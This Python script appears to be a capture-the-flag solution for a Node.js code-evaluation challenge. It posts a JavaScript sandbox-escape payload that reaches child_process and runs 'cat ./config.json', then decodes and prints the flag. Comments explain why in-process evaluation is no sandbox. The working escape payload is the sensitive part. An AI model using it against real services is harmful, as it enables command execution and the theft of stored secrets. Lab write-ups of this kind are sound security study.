#!/usr/bin/python
import urllib.request
import urllib.parse
import json
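class Payload(object):
    """Wrapper around a JSON object received as text or bytes.

    The parsed object is kept in a single private attribute rather than being
    assigned to ``__dict__``. Assigning remote JSON to ``__dict__`` lets the
    sender choose instance attribute names, so a key such as ``"get"`` would
    shadow the ``get`` method and break every later lookup.

    Args:
        j: JSON document (``str``, ``bytes`` or ``bytearray``) whose top-level
            value must be an object.

    Raises:
        ValueError: if ``j`` is not valid JSON (``json.JSONDecodeError``).
        TypeError: if the top-level JSON value is not an object.
    """

    def __init__(self, j):
        parsed = json.loads(j)
        if not isinstance(parsed, dict):
            raise TypeError(
                "Payload expects a JSON object, got %s" % type(parsed).__name__
            )
        self._data = parsed

    def __getattr__(self, name):
        """Expose top-level keys as attributes, as the ``__dict__`` form did.

        Only called when normal lookup fails, so methods and ``_data`` always
        win over a key of the same name.
        """
        # Read through __dict__ so a half-built instance cannot recurse here.
        data = self.__dict__.get("_data")
        if data is not None and name in data:
            return data[name]
        raise AttributeError(name)

    def get(self, key):
        """Return the value stored under ``key``.

        Raises:
            KeyError: if ``key`` is absent from the parsed object.
        """
        return self._data[key]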
# Expression submitted to the challenge service's /run endpoint. It shows why
# evaluating caller-supplied JavaScript in-process is not a sandbox: the
# constructor chain climbs from an ordinary object to the Function constructor
# of the host context, and from there to `process`, the module loader and
# `child_process` (the host appears to be Node.js). The service's own
# ./config.json is therefore readable from "sandboxed" code. The defensive
# takeaway is to run untrusted code in a separate, unprivileged
# process/container with no access to secrets rather than relying on
# in-process evaluation.
code = 'new Function("return (this.constructor.constructor(\'return (this.process.mainModule.constructor._load)\')())")()("child_process").execSync("cat ./config.json")'
url = "http://whale.hacking-lab.com:3000/run"

# The expression is sent as the form field "run" in a POST body (plain HTTP,
# as written on the page).
form_fields = {"run": code}
data = urllib.parse.urlencode(form_fields).encode()
request = urllib.request.Request(url, data=data)
response = urllib.request.urlopen(request).read()

# The reply is a JSON object; its "result" field holds text that contains a
# bracketed, comma-separated list of integers.
envelope = Payload(response)
result = envelope.get("result")

# str.find returns -1 when a bracket is absent; the slice below then covers a
# different range instead of raising, exactly as in the original script.
open_at = result.find("[")
close_at = result.find("]")
byte_tokens = result[open_at + 1:close_at].split(",")

# Each integer is one character code of the file contents returned by the host.
decoded_chars = []
for token in byte_tokens:
    decoded_chars.append(chr(int(token.strip())))
result = "".join(decoded_chars)

# The decoded text is itself a JSON object; print its "flag" entry.
p = Payload(result)
print(p.get("flag"))